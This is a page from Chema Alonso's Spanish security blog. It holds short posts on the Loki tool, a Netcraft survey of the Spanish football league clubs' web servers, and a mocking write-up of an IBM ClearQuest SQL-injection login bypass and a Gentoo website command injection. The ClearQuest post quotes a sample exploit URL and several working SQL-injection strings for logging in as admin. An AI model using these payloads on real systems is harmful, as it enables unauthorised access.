Loki está libre

Saludos Malignos!
Blog personal de Chema Alonso sobre sus cosas.
Publicado por
Chema Alonso
a las
12:01 a. m.
4
comentarios
Etiquetas: Gentoo, Hacking, Herramientas, Linux, mitm, Seguridad Informática, Ubuntu
***********************************************************
Este informe se hizo utilizando Site Report de Netcraft y no ofrece resultados actuales. A pesar de que toda la información que se muestra aquí en algún momento ha sido real, es neceseario actualizar los datos. Valga el siguiente POST para reforzar esto.
***********************************************************
Aprovechando que se acabó la pretemporada y comienza la Liga 2007/2008, el presente post recoge, a modo de curiosidad, los datos devueltos por los servidores web que utilizan los equipos de la Primera División Española de Futbol, que aquí llamaremos la "Fortune 20". Para ello se han utilizado los servicios de NetCraft "What's that site running?" para obtener la información.
Tabla de Datos
Publicado por
Chema Alonso
a las
10:26 a. m.
15
comentarios
Etiquetas: Apache, Gentoo, IIS, Internet, Linux, Spectra, Sun Solaris, Ubuntu, Windows Server
Hoy es sábado y no me apetece ser muy malo ni tener mucha guerra, pero...un poco sí.
Revisando los últimos exploits me encuentro con este:
IBM Rational ClearQuest Web Login Bypass (SQL Injection)
SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE
Log in as "admin":
==================
' OR login_name LIKE '%admin%'--
(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...
Tras la cagada de "Como comerse una comilla" siempre piensas, que esa es un buena cagada, pero que IBM se coma una comilla en el campo USERNAME de un formulario de login indica el número de pruebas que le han hecho a este producto de seguridad: EXACTEMANTE Cero mil cero cientas cero cero o dicho de otra forma, en binario 0000000.
La otra cagadita del día, ha sido la de Gentoo, que me ha encantado, en este caso el Bug#: 187971
Gentoo Website Command Injection Issue
El problema está en que no está bien filtrado y se hace una llamada a exec por lo que basta con poner un ";" y ejecutar cualquier otra instrucción en el sistema operativo. Una Injección de comandos remota.
Cuando esto se hace público rápidamente el progrmador busca una solución y se la postea a los colegas porque
"Sorry I am out of town and don't have access to Gentoo servers"
pero se lo curra y ofrece una solución:
for the resolution, the solution should be something more to the effect:
[!--#exec cmd="export QUERY_STRING;./similar.py" --]
No obstante, luego recapacita y se da cuenta de "ups!, yo creo que esto lo he hecho más veces!". Y vuelve a postear:
Oh, forgot to mention... they /similar page is not the only one where "exec
cmd" is used. So this will have to be fixed in all occurrences. They're all
found in mksite.py though.
Al final, se optó por tirar abajo los servidores hasta que regresaran de las conferecias, y luego lo explicaron.
¿Serían conferencias sobre seguridad? ¿Auditoría de código? ¿Testing? ¿Planes de respaldo? ¿Gestión de CPD? ¿downtime?
Publicado por
Chema Alonso
a las
10:31 a. m.
15
comentarios
Etiquetas: Gentoo, IBM, Linux, Seguridad Informática, SQL Injection
Hace un mes comencé a recuperar en un post mi interés en los últimos años, donde he publicado muchos artículos en este blog , y he dejado mu...